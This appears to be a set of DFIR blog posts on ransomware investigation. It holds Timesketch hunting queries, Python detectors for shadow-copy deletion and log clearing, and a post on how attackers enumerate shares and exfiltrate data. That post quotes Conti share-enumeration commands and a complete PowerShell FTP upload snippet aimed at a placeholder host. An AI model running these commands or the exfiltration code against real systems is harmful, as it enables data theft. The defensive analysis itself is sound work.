    Efficiency Issues with Decryptors

    Decryptors, even those provided by attackers after paying the ransom, are not always efficient. They may be slow, non-multithreaded, or otherwise poorly designed. For example, the decryptor provided by DarkSide ransomware during the Colonial Pipeline attack was notoriously slow, leading responders to develop a custom tool using the provided decryption key.

    Remember: Always back up encrypted data before attempting decryption to avoid potential data loss.

    Conclusion

    By understanding the methodologies and tactics employed during the "Impact" phase of a ransomware attack, organizations can better prepare their defenses, respond more effectively, and mitigate the risks associated with these increasingly sophisticated threats.

    Akash Patel
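The native-tool activity described in this post (shadow copy deletion, recovery tampering, inbound firewall blocks, log clearing, BITS temp files) and in the Domain Controller hash post above (the ntdsutil IFM export, which writes a copy of NTDS.dit outside its home directory) can be matched on process-creation and file-creation events. The following Python is an added detection example, not code from either post, with patterns built only from the commands the posts quote; the normalized event fields (host, event_id, image, command_line, file_path) and every sample event are assumptions/constructed.

```python
"""Detection logic for the native-tool activity described in the Domain
Controller hash post (ntdsutil IFM export) and the ransomware Impact post.

Added example, not code from either post. Assumes process-creation events
(Sysmon Event ID 1 / Security 4688) and file-creation events (Sysmon
Event ID 11) already normalized to dicts; all events below are constructed.
"""
import re
from typing import Dict, List

# Patterns built from the commands quoted in the posts.
PROCESS_RULES = [
    ("ntdsutil executed (IFM sub-commands are typed interactively, so correlate with ntds.dit writes)",
     re.compile(r"(^|\\|\s)ntdsutil(\.exe)?\b", re.I)),
    ("vssadmin shadow copy deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic shadow copy deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("PowerShell shadow copy deletion",
     re.compile(r"Win32_ShadowCopy.*?(\.Delete\(\)|_Delete\(\)|Remove-WmiObject|Remove-CimInstance)", re.I)),
    ("bcdedit recovery environment disabled",
     re.compile(r"bcdedit.*?(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("wbadmin backup catalog or system state deletion",
     re.compile(r"wbadmin.*?delete\s+(catalog|systemstatebackup)", re.I)),
    ("inbound firewall block rule",
     re.compile(r"(New-NetFirewallRule.*?-Action\s+Block|netsh\s+advfirewall\s+firewall\s+add\s+rule.*?action=block)", re.I)),
    ("event log clearing", re.compile(r"\bClear-EventLog\b", re.I)),
]
# BITS temp file naming from the post's Sysmon Event ID 11 query.
BITS_TEMP_RE = re.compile(r"\\BITF[0-9]+\.tmp$", re.I)
# ntds.dit normally lives under \Windows\NTDS; "ifm create full" writes a copy elsewhere.
NTDS_RE = re.compile(r"\\ntds\.dit$", re.I)
NTDS_HOME_RE = re.compile(r"\\Windows\\NTDS\\ntds\.dit$", re.I)


def check_process(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose pattern matches the command line (or image)."""
    cmd = event.get("command_line") or event.get("image", "")
    return [name for name, rx in PROCESS_RULES if rx.search(cmd)]


def check_file_create(event: Dict[str, str]) -> List[str]:
    """File-creation checks: BITS temp files and out-of-place ntds.dit copies."""
    path = event.get("file_path", "")
    hits = []
    if BITS_TEMP_RE.search(path):
        hits.append("BITS temporary transfer file created")
    if NTDS_RE.search(path) and not NTDS_HOME_RE.search(path):
        hits.append("ntds.dit written outside the NTDS directory (possible IFM export)")
    return hits


def scan(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Route each event to the right checker and keep only the ones that hit."""
    findings = []
    for ev in events:
        hits = check_file_create(ev) if ev["event_id"] == 11 else check_process(ev)
        if hits:
            findings.append({"host": ev["host"], "event_id": ev["event_id"], "rules": hits,
                             "evidence": ev.get("command_line") or ev.get("file_path")})
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"host": "DC01", "event_id": 1, "image": r"C:\Windows\System32\ntdsutil.exe", "command_line": "ntdsutil"},
    {"host": "DC01", "event_id": 11, "file_path": r"C:\ntds\Active Directory\ntds.dit"},
    {"host": "DC01", "event_id": 11, "file_path": r"C:\Windows\NTDS\ntds.dit"},  # legitimate location
    {"host": "WS07", "event_id": 1, "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin.exe delete Shadows /all /quiet"},
    {"host": "WS07", "event_id": 1, "image": r"C:\Windows\System32\bcdedit.exe",
     "command_line": "bcdedit /set {default} recoveryenabled no"},
    {"host": "WS07", "event_id": 1, "image": PS,
     "command_line": "powershell.exe -c \"Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }\""},
    {"host": "WS07", "event_id": 1, "image": r"C:\Windows\System32\netsh.exe",
     "command_line": 'netsh advfirewall firewall add rule name="Block PORTS7" protocol=TCP dir=in localport=443 action=block'},
    {"host": "WS07", "event_id": 1, "image": PS,
     "command_line": "powershell.exe Clear-EventLog -LogName Application, Security, System"},
    {"host": "WS07", "event_id": 11, "file_path": r"C:\Users\Public\BITF1234.tmp"},
    {"host": "WS07", "event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\notes.txt"},  # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["host"], f["event_id"], f["rules"], f["evidence"])
```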

  • Mastering Threat Detection/Hunting with Specific Queries

When it comes to detecting malicious activity and potential security threats, analyzing the right data sources is crucial. Whether you are working with SIEM tools, conducting threat hunting, or performing forensic analysis, the following queries can be invaluable. The logic behind these queries stays the same, though the syntax may need to be adjusted for the platform you are using, such as Timesketch, Kibana, or another log management system. The field names used below (parser, key_path, source_name, event_identifier, xml_string, message, values, data_type) are the attributes a Plaso timeline exposes in Timesketch; the asterisk is a wildcard.

1. Detecting System Configuration and Host Information

CurrentControlSet
The Select key records which control set the machine booted with (Current, Default, Failed, LastKnownGood). Use it to resolve CurrentControlSet to the right ControlSet00N when you read a SYSTEM hive offline.
Query: parser:winreg AND key_path:"HKEY_LOCAL_MACHINE\\System\\Select*"

Host Network Interfaces
Identify the network interfaces configured on the host, to baseline network settings and spot unauthorized changes.
Query: parser:winreg AND key_path:"*Parameters\\Interfaces*"

Hostname
Retrieve the hostname of the system, used for identification in multi-host environments.
Query: parser:winreg AND key_path:"*Control\\ComputerName\\ComputerName*"

Network Shares
List the shares the host exposes, which can reveal exposed resources or unauthorized additions. The NOT message:*empty* clause drops keys with no values.
Query: parser:winreg AND key_path:"*Lanmanserver\\Shares*" AND NOT message:*empty*

Software - Sysinternals Tool Usage Indicator
Sysinternals tools write an EulaAccepted value under Software\Sysinternals\<tool> in the user's hive on first run (passing -accepteula still writes it), so the key is evidence that the tool was executed. Administrators and attackers both use these tools, so check which user and which tool.
Query: parser:"winreg" AND key_path:"*Software\\Sysinternals\\*" AND values:"*EulaAccepted*"

2. Monitoring Remote Desktop Protocol (RDP) Activity

T1021.001 - RDP Client Connection History
The Terminal Server Client\Default key holds the MRU list of hosts the user connected to with mstsc, and \Servers holds the username used for each host, so this query shows outbound RDP from the examined system and helps trace lateral movement from a patient-zero host.
Query: parser:winreg AND (key_path:"*Microsoft\\Terminal Server Client\\Default*" OR key_path:"*Microsoft\\Terminal Server Client\\Servers*")

T1021.001 - RDP Activity Ended
LocalSessionManager events 23 (logoff), 24 (disconnected), 39 and 40 (disconnected by another session, or with a reason code), plus Security 4779 (session disconnected from a window station). A 24 whose address is LOCAL is a console disconnect and is excluded.
Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:24 AND NOT xml_string:"*Address>LOCAL*") OR event_identifier:39 OR event_identifier:40 OR event_identifier:23)) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4779)

T1021.001 - RDP Activity Started
LocalSessionManager 21 (logon), 22 (shell start) and 25 (reconnect) with a non-LOCAL source address, Security 4624 with LogonType 10 (RemoteInteractive), and 4778 (session reconnected).
Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:21 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:22 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:25 AND NOT xml_string:"*Address>LOCAL*"))) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4624 AND xml_string:"*LogonType\">10*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4778)

3. Identifying Potential Lateral Movement

T1021.002 - Potential SMB Lateral Movement (Source)
Event 4648 (logon attempted with explicit credentials) records the target server and port; port 445 means SMB. Note that 4648 is written on the host the attacker is operating from, not on the target, which is why this is the "source" side.
Query: parser:winevtx AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4648 AND xml_string:"*IpPort\">445*"

4. Monitoring Task and Script Execution

T1053.005 - Scheduled Tasks
Scheduled tasks are a common persistence mechanism. Tasks are registered under TaskCache\Tree; the filter drops the built-in Microsoft\ tree and entries whose only value is the default security descriptor.
Query: parser:winreg AND key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree*" AND NOT key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft*" AND NOT message:"*SD: [REG_BINARY] (220 bytes)*"

T1059 - PowerShell Web Request
Detect PowerShell being used to fetch content, a staple of fileless malware, in script block logs (4104), process creation with command-line auditing (4688) or Sysmon process creation (1). Expect noise: iwr, wget and curl are aliases of Invoke-WebRequest in Windows PowerShell, and the curl pattern also matches the real curl.exe.
Query: parser:"winevtx" AND (event_identifier:"4104" OR event_identifier:"4688" OR event_identifier:"1") AND (message:"*Invoke-WebRequest*" OR message:"*iwr*" OR message:"*wget*" OR message:"*curl*" OR message:"*Net.WebClient*" OR message:"*Start-BitsTransfer*")

T1059.001 - PowerShell Configuration
Monitor changes to PowerShell settings, which might indicate an attacker altering the execution policy or turning off script and module logging.
Query: parser:"winreg" AND key_path:"*Microsoft\\PowerShell*" AND (message:*EnableScript* OR message:*ExecutionPolicy* OR message:*EnableModuleLogging*)

5. Security Monitoring and Defense Evasion

T1070.001 - Windows Log Cleared
Event 1102 is written to the Security log when it is cleared, a common way to cover tracks. Clearing other logs produces System event 104 instead, which you may want to add.
Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Eventlog" AND event_identifier:"1102"

T1078 - Windows Account Activity
Account changes and privileged activity: 4722 account enabled, 4724 password reset attempt, 4728 member added to a global group, 4733 member removed from a local group, 4672 special privileges assigned to a new logon, 4634 logoff.
Query: parser:"winevtx" AND (event_identifier:"4722" OR event_identifier:"4724" OR event_identifier:"4728" OR event_identifier:"4634" OR event_identifier:"4672" OR event_identifier:"4733")

T1078.003 - Query for a Blank Password for an Account
Event 4797 is logged when a process checks whether an account has a blank password. Account-enumeration tooling triggers it; some legitimate software does too, so baseline it.
Query: parser:"winevtx" AND event_identifier:"4797"

6. Detecting Suspicious Network Activity and Proxy Configurations

T1090 - Proxy Config
Identify modifications to proxy settings, which may indicate proxy-aware malware or unauthorized network changes.
Query: parser:"winreg" AND key_path:"HKEY_LOCAL_MACHINE\\Software\\*\\Microsoft\\Windows\\CurrentVersion\\Internet Settings*" AND (values:*AutoDetect* OR values:*ProxyServer* OR values:*ProxyOverride* OR values:*ProxyEnable*)

T1110 - SQL Server Failure
SQL Server logs failed logins as event 18456 in the Application log; bursts of them indicate brute-force or dictionary attacks.
Query: parser:winevtx AND display_name:"*Logs\\Application\.evtx" AND event_identifier:"18456"

T1110 - Suspicious Logon Failures
Failed logons (4625), lockouts (4740), unlocks (4767) and NTLM credential validation (4776, whose failures carry an error code). Many failures across many accounts from one source is password spraying; many against one account is brute force.
Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND (event_identifier:"4625" OR event_identifier:"4767" OR event_identifier:"4740" OR event_identifier:"4776")

7. Execution, Persistence, Defense Evasion and System Baseline

T1197 - Suspicious BitsTransfer Activity
BITS-Client event 59 (job started) where the URL or file name points to a script, executable or archive.
Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Bits-Client" AND event_identifier:"59" AND (strings:"*\.ps1*" OR strings:"*\.bat*" OR strings:"*\.exe*" OR strings:"*\.dll*" OR strings:"*\.zip*" OR strings:"*\.rar*" OR strings:"*\.7z*" OR strings:"*\.tar*")

T1204 - Execution
A union of execution artifacts: MUICache, Prefetch, process creation (4688), LastVisitedPidlMRU / LastVisitedMRU and Program Compatibility Assistant events (500).
Query: (parser:"winreg" AND (key_path:"*Microsoft\\Windows\\ShellNoRoam\\MUICache*" OR key_path:"*Software\\Microsoft\\Windows\\Shell\\MUICache*")) OR parser:"prefetch" OR (parser:"winevtx" AND event_identifier:"4688") OR (parser:"winreg" AND key_path:"*LastVisitedPidlMRU*") OR (parser:"winreg" AND key_path:"*LastVisitedMRU*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Application-Experience" AND event_identifier:"500")

T1204 - Execution of a Binary via BAM
Background Activity Moderator entries (Windows 10 1709 and later) record the last execution time of a binary per user SID.
Query: parser:"bam" AND binary_path:*exe

T1204 - Execution or Existence of a File
AppCompatCache (Shimcache) entries. On Windows 10 an entry proves the file existed and was seen by the loader or Explorer, not necessarily that it ran.
Query: parser:"appcompatcache" AND (path:*exe* OR path:*cpl* OR path:*ps1* OR path:*msi* OR path:*dll* OR path:*bat*)

T1204 - User Execution or Shortcut
UserAssist records GUI-launched programs and shortcuts with run counts and last-run times.
Query: parser:"userassist" AND (value_name:*lnk* OR value_name:*exe*)

T1543 - Installation or Execution of a Windows Service
New services (System 7045, Security 4697), excluding svchost-hosted services.
Query: parser:"winevtx" AND (event_identifier:"7045" OR event_identifier:"4697") AND NOT message:"*svchost.exe -k*"

T1546.003 - WMI CommandLine Consumer
Assumes execution events have already been tagged Execution (for example by a Timesketch tagging analyzer); WmiPrvSE as the parent marks WMI-spawned execution.
Query: tag:Execution AND message:*wmiprvse*

T1547.001 - Windows Autorun
Run and RunOnce entries pointing at executables, DLLs or scripts.
Query: parser:"windows_run" AND (message:*exe* OR message:*.dll* OR message:*.bat* OR message:*.ps1*)

T1548.002 - UAC Disabled in Registry
EnableLUA set to 0 turns User Account Control off entirely.
Query: parser:"winreg" AND key_path:"*Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" AND message:"*DisplayType: [REG_DWORD_LE] 0*"

T1560 or T1083 - File Save or Discovery
OpenSaveMRU records files opened or saved through common dialogs.
Query: parser:"winreg" AND key_path:*OpenSave*MRU* AND message:*Shell*

T1560.001 - Archived Files
Archive names appearing in LNK files, shell items, Jump Lists and MRU lists, which is where staged data surfaces.
Query: (data_type:"windows:lnk:link" OR data_type:"windows:shell_item:file_entry" OR data_type:"olecf:dest_list:entry" OR data_type:"windows:registry:mrulistex") AND (message:*.zip* OR message:*.7z* OR message:*.tar.gz* OR message:*.tar* OR message:*.gz*)

T1562.001 - Windows Defender Disabled
Defender operational events 5001 (real-time protection disabled), 5010 (malware scanning disabled) and 5012 (virus scanning disabled).
Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Defender" AND (event_identifier:"5001" OR event_identifier:"5010" OR event_identifier:"5012")

T1562.001 - Windows Defender Disabled via Registry
Query: parser:"winreg" AND key_path:"*Microsoft\\Windows Defender*" AND (values:"*DisableRealtimeMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiSpyware: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiVirus: \[REG_DWORD_LE\] 1*" OR values:"*DisableBehaviorMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableIOAVProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableOnAccessProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableScanOnRealtimeEnable: \[REG_DWORD_LE\] 1*" OR values:"*DisableEnhancedNotifications: \[REG_DWORD_LE\] 1*" OR values:"*DisableBlockAtFirstSeen: \[REG_DWORD_LE\] 1*")

T1562.001 - Windows Defender Disabled via PowerShell
Set-MpPreference is the supported way to change Defender settings, which makes it the attacker's way too.
Query: parser:"winevtx" AND message:"*Set-MpPreference*" AND (message:"*Disable*" OR message:"*Reporting*" OR message:"*SubmitSamplesConsent*" OR message:"*DefaultAction*")

T1562.001 - Windows Defender Exclusions
Exclusions in the registry, or Defender event 5007 (configuration changed) mentioning Exclusions. Attackers typically exclude their staging directory or tool path.
Query: (parser:"winreg" AND key_path:"*Windows Defender\\Exclusions\*" AND NOT message:*empty*) OR (parser:"winevtx" AND event_identifier:"5007" AND message:*Exclusions*)

T1562.004 - Windows Firewall Disabled
EnableFirewall set to 0 under the firewall profile keys in SOFTWARE (policy) or SYSTEM.
Query: parser:"winreg" AND (display_name:*SOFTWARE OR display_name:*SYSTEM) AND (message:"*EnableFirewall: [REG_DWORD] 0x00000000*" OR message:"*EnableFirewall: [REG_DWORD_LE] 0*")

T1562.004 - Windows Firewall Rules
Rule definitions in the registry, or firewall event 2005 (rule modified). The neighbouring IDs 2004 (rule added) and 2006 (rule deleted) are worth adding.
Query: (parser:"winreg" AND key_path:"*FirewallRules*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Firewall With Advanced Security" AND event_identifier:"2005")

Timezone
Needed to interpret any local timestamps in the timeline.
Query: parser:"winreg" AND key_path:"*Control\\TimeZoneInformation*"

Windows Network Adapter Details
Query: parser:"winreg" AND key_path:"*Tcpip/Parameters/Interfaces*" AND NOT message:*empty*

Windows OS Version
Query: parser:"winreg" AND data_type:"windows:registry:installation"

Windows Patch Installation Success
WindowsUpdateClient event 19 in the System log; useful for deciding whether a known vulnerability was patched at the time of the incident.
Query: parser:"winevtx" AND source_name:"Microsoft-Windows-WindowsUpdateClient" AND display_name:"*System\\.evtx" AND event_identifier:"19"

Windows User Profiles
Query: parser:"winreg/winreg_default" AND key_path:"*ProfileList*"

These queries form the backbone of effective threat detection and forensic analysis. Happy hunting!
Akash Patel
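The same rule logic is easy to carry into plain Python when the only thing you have is a CSV or JSONL export of a Plaso timeline and no Timesketch instance. The block below is an added example, not code from the original post: it re-expresses the "RDP Activity Started", "SMB Lateral Movement (Source)", "UAC Disabled in Registry" and "Windows Log Cleared" rules as predicates over Plaso-style event dicts, with the same field names as the queries. The event records are constructed for the example, and the "DisplayType" wording in the registry message simply mirrors the query above.

```python
"""Run a handful of the Timesketch rules above as Python predicates.

Added example, not from the original post. Events are dicts with the Plaso
attribute names used by the queries (parser, source_name, event_identifier,
xml_string, key_path, message). SAMPLE_EVENTS are constructed.
"""
import re


def like(value, pattern):
    """Case-insensitive wildcard match where * matches any run of characters
    (square brackets are literal, unlike fnmatch)."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, str(value or ""), re.IGNORECASE | re.DOTALL) is not None


def rdp_started(ev):
    """T1021.001 - RDP Activity Started, non-LOCAL sessions only."""
    if ev.get("parser") != "winevtx":
        return False
    src, eid, xml = ev.get("source_name"), ev.get("event_identifier"), ev.get("xml_string", "")
    if src == "Microsoft-Windows-TerminalServices-LocalSessionManager":
        return eid in (21, 22, 25) and not like(xml, "*Address>LOCAL*")
    if src == "Microsoft-Windows-Security-Auditing":
        return (eid == 4624 and like(xml, '*LogonType">10*')) or eid == 4778
    return False


def smb_lateral_source(ev):
    """T1021.002 - explicit-credential logon (4648) towards port 445."""
    return (ev.get("parser") == "winevtx"
            and ev.get("source_name") == "Microsoft-Windows-Security-Auditing"
            and ev.get("event_identifier") == 4648
            and like(ev.get("xml_string"), '*IpPort">445*'))


def uac_disabled(ev):
    """T1548.002 - EnableLUA written as 0."""
    return (ev.get("parser") == "winreg"
            and like(ev.get("key_path"),
                     r"*Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA")
            and like(ev.get("message"), "*DisplayType: [REG_DWORD_LE] 0*"))


def log_cleared(ev):
    """T1070.001 - Security log cleared (1102)."""
    return (ev.get("parser") == "winevtx"
            and ev.get("source_name") == "Microsoft-Windows-Eventlog"
            and ev.get("event_identifier") == 1102)


RULES = {"rdp_started": rdp_started, "smb_lateral_source": smb_lateral_source,
         "uac_disabled": uac_disabled, "log_cleared": log_cleared}

# Constructed sample timeline: one remote RDP logon, one console (LOCAL)
# logon that must not fire, a 4624 type 10, a 4648 to port 445, EnableLUA=0
# and a cleared Security log.
SAMPLE_EVENTS = [
    {"timestamp": "2024-03-01T02:14:07", "parser": "winevtx",
     "source_name": "Microsoft-Windows-TerminalServices-LocalSessionManager",
     "event_identifier": 21,
     "xml_string": "<User>CORP\\jdoe</User><SessionID>3</SessionID><Address>10.10.5.23</Address>"},
    {"timestamp": "2024-03-01T02:14:09", "parser": "winevtx",
     "source_name": "Microsoft-Windows-TerminalServices-LocalSessionManager",
     "event_identifier": 21,
     "xml_string": "<User>CORP\\svc_backup</User><SessionID>1</SessionID><Address>LOCAL</Address>"},
    {"timestamp": "2024-03-01T02:20:41", "parser": "winevtx",
     "source_name": "Microsoft-Windows-Security-Auditing", "event_identifier": 4624,
     "xml_string": '<Data Name="LogonType">10</Data><Data Name="IpAddress">10.10.5.23</Data>'},
    {"timestamp": "2024-03-01T02:31:00", "parser": "winevtx",
     "source_name": "Microsoft-Windows-Security-Auditing", "event_identifier": 4648,
     "xml_string": '<Data Name="TargetServerName">FS01</Data><Data Name="IpPort">445</Data>'},
    {"timestamp": "2024-03-01T02:33:12", "parser": "winreg",
     "key_path": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "message": r"[HKEY_LOCAL_MACHINE\...\Policies\System\EnableLUA] DisplayType: [REG_DWORD_LE] 0"},
    {"timestamp": "2024-03-01T02:40:55", "parser": "winevtx",
     "source_name": "Microsoft-Windows-Eventlog", "event_identifier": 1102},
]


def hunt(events, rules=RULES):
    """Return [(rule_name, timestamp)] for every event matching a rule, in timeline order."""
    hits = []
    for ev in events:
        for name, rule in rules.items():
            if rule(ev):
                hits.append((name, ev["timestamp"]))
    return hits


if __name__ == "__main__":
    for name, ts in hunt(SAMPLE_EVENTS):
        print(f"{ts}  {name}")
```

The console session (Address LOCAL) is the one the NOT clause in the query exists for; with these rules run in order you get five hits, not six. Swap SAMPLE_EVENTS for rows read from your export and keep the predicates as the single place where the rule logic lives.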

  • Ransomware Actors Access and Stage Data for Exfiltration

Ransomware attacks continue to evolve, with actors using advanced tactics to access and exfiltrate sensitive data. Understanding their methods is crucial for preventing and mitigating the damage they cause.

1. Data Access: Network Shares - Enumerated and Reviewed
One of the primary targets for ransomware actors is your network shares. To find them, attackers use tools such as:
Invoke-ShareFinder (PowerView, originally part of the Veil-Framework): enumerates the shares exposed by every host in a domain. You can explore the tool or test its capabilities in the Veil-PowerView repository on GitHub.
SharpShares: queries all hosts in a domain and checks the current user's access to each share. See the SharpShares repository on GitHub.
Example commands from the leaked Conti chat logs illustrate how these tools are used:
1. Invoke-ShareFinder -Domain [domain_name_here].local | Out-File sharfindINFO.txt
2. SharpSharesNG.exe shares
Attackers may also map shares directly with legitimate commands, for example:
net use * "\\192.168.168.10\Shares" /persistent:no /user:DOMAIN\username
To detect share access, two Security events must be generated:
Event ID 5140: A network share object was accessed.
Event ID 5145: A network share object was checked to see whether the client can be granted the desired access.
Both belong to the Object Access audit category, which the following command enables for successful accesses:
auditpol /set /category:"Object Access" /success:enable
That switches on every subcategory in Object Access and is noisy; if you only want these two events, enable the "File Share" (5140) and "Detailed File Share" (5145) subcategories with auditpol's /subcategory switch instead. Expect 5145 to be high-volume on file servers, since it is logged once per access check rather than once per session. Share enumeration shows up as a single account touching \\*\IPC$ (RelativeTargetName srvsvc) on many hosts within a few minutes, which is the pattern Invoke-ShareFinder and SharpShares leave behind.

2. Identifying Network Share Access via the Registry
Network share access can also be traced through several registry keys:
Mapped Network Drive Most-Recently Used (MRU) items: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
Mapped Network Drives (Network Drive Wizard): HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
Items typed into Windows Explorer: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
Items typed into the Windows Run dialog: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
All open shares on a system: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares

3. Forensic Analysis of File and Folder Access
From a forensic perspective, identifying which files or folders were accessed is crucial. Key artifacts: Open/Save MRU, Recent Files, Shellbags, LNK files, Last-Visited MRU and Office Recent Files. For file and folder access, refer to my previous blog posts:
Artifacts for File Opening & Creation (Part 1): Open/Save MRU, Recent Files, Shellbags
Artifacts for File Opening & Creation (Part 2): Last-Visited MRU, Office Recent Files, LNK Files
To identify deleted files or evidence of file knowledge, explore these:
Artifacts for Deleted File & File Knowledge (Part 1): ACMRU, Last-Visited MRU, Vista/Win7/10
Artifacts for Deleted File or File Knowledge (Part 2): Search, WordWheelQuery, Index.dat File

4. Registry Artifacts: TypedPaths & TypedURLs
TypedPaths reveal paths the user typed into the Explorer address bar; see Part 1: Windows Registry Artifacts - Insights into User Activity.
TypedURLs are stored at NTUSER.DAT\Software\Microsoft\Internet Explorer\TypedURLs and hold locations typed into the Internet Explorer address bar, UNC paths included, so they complement TypedPaths.

Data Exfiltration

1. Staging and Compression
Before exfiltrating data, ransomware actors typically compress it into archives, commonly .zip, .7z and .rar, using tools such as 7za.exe or rar.exe. Be alert for these file types appearing in unusual locations, especially .rar, which has few legitimate uses on most corporate hosts. Native compression that needs no extra tooling: the Compress-Archive cmdlet, the tar command (built into Windows 10 1803 and later) and Explorer's Send to > Compressed (zipped) folder.

2. Data Staging
Attackers often copy files into a staging directory, typically a temporary folder, where they are renamed or bundled into archives. These operations go unnoticed unless specific alerts are configured. When reviewing a system for data staging, focus on archive creation. Analysis of the $MFT and $UsnJrnl is extremely useful here. Sysmon Event ID 11 (FileCreate) shows which process created the archive and when; the archive's size is not part of that event, so take it from the $MFT record or from the DataExtend entries in the USN journal.

3. Creation of Multiple Text Files
Adversaries may redirect tool output to text files, since text compresses well and keeps the exfiltrated volume small: gigabytes of directory listings or database exports can shrink to megabytes, which is easier to move without tripping volume-based alerts.

Note: adversaries, especially in ransomware cases, usually delete the archives they have exfiltrated; they do not want you to see what they took. In that case you will need $UsnJrnl:$J analysis.
You might ask: if you have the $MFT, why rely on $UsnJrnl:$J to identify data exfiltration?
1. The $MFT is a snapshot of the file system as it is now; once a deleted file's record is reused, the archive is gone from it. $UsnJrnl:$J is a log of change events over time.
2. Exfiltration involves subtle modifications, renaming and deletion of files. The $MFT may not capture any of these, while $UsnJrnl:$J records each operation, which is crucial for detecting sophisticated exfiltration techniques.
Example: if an attacker creates a zip file to bundle exfiltrated data, the $MFT records that the zip exists, until it is deleted and the record is reused. $UsnJrnl:$J logs the sequence: FileCreate, the DataExtend writes as the archive grows, Close, any RenameOldName/RenameNewName before the transfer, and finally FileDelete, each with its own timestamp.

4. WinZip, 7-Zip and WinRAR Artifacts
Adversaries frequently use WinZip, 7-Zip and WinRAR to compress and archive data. These tools leave traces in the user's hive that are useful for forensic analysis:
WinZip: NTUSER.DAT\Software\Nico Mak Computing\WinZip\
7-Zip: NTUSER.DAT\Software\7-Zip\ (Compression\ArcHistory lists archives recently created)
WinRAR: NTUSER.DAT\Software\WinRAR\ (ArcHistory lists archives recently opened or created)
These keys can show which archives were created or manipulated during the incident.

5. Detecting Renamed Executables
Ransomware actors often rename executables (PE files), but they rarely edit the file's VERSIONINFO resource, which holds fields such as Description, Product, Company and OriginalFileName. OriginalFileName is particularly useful for hunting: a process whose image name differs from its OriginalFileName is a renamed binary. Sysmon Event ID 1 records OriginalFileName as a field, and so do most EDRs; Security Event ID 4688 records only the process path and command line, so with 4688 alone you have to inspect or hash the file on disk to make the comparison.

Cloud-Based File Sharing Sites
Adversaries might use cloud services such as MEGA, SendSpace, WeTransfer, Google Drive, Dropbox, Box or OneDrive, or cloud storage buckets on AWS, GCP and Azure. Blocking unauthorized access to these platforms can prevent exfiltration. The "Living Off Trusted Sites" (LOTS) project catalogs sites used for malicious purposes, including data exfiltration and phishing: https://lots-project.com/

FTP/SFTP Exfiltration
Despite being an insecure protocol, FTP remains a popular choice for data exfiltration. FTP uses TCP port 21 for control and 20 for active-mode data; SFTP is a different protocol that runs over SSH on TCP 22. Tools such as WinSCP and FileZilla are often employed by adversaries.
FileZilla artifact locations (these are configuration and queue files; FileZilla writes transfer logs only if logging is enabled in its settings):
%APPDATA%\FileZilla\filezilla.xml
%APPDATA%\FileZilla\recentservers.xml
%APPDATA%\FileZilla\trustedcerts.xml
%APPDATA%\FileZilla\sitemanager.xml
%APPDATA%\FileZilla\*.sqlite3 (queue.sqlite3 holds the transfer queue)
Example of PowerShell code used for FTP data transfer ($RemoteFile, $LocalFile, $Username and $Password are placeholders the operator sets beforehand):
# Placeholders set by the operator: $RemoteFile (ftp://host/path), $LocalFile, $Username, $Password
$FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
$FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
$FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
$FTPRequest.Credentials = New-Object System.Net.NetworkCredential($Username, $Password)
$FTPRequest.UseBinary = $true
$FTPRequest.UsePassive = $true
# Stream the local file into the request body and complete the upload
$Bytes = [System.IO.File]::ReadAllBytes($LocalFile)
$Stream = $FTPRequest.GetRequestStream()
$Stream.Write($Bytes, 0, $Bytes.Length)
$Stream.Close()
$FTPRequest.GetResponse().Close()

2. WinSCP Registry Artifacts
WinSCP, another popular file transfer tool, leaves traces in the registry that help detect exfiltration:
HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache
HKCU\Software\Martin Prikryl\WinSCP 2\Configuration\Logging
HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History\LocalTarget
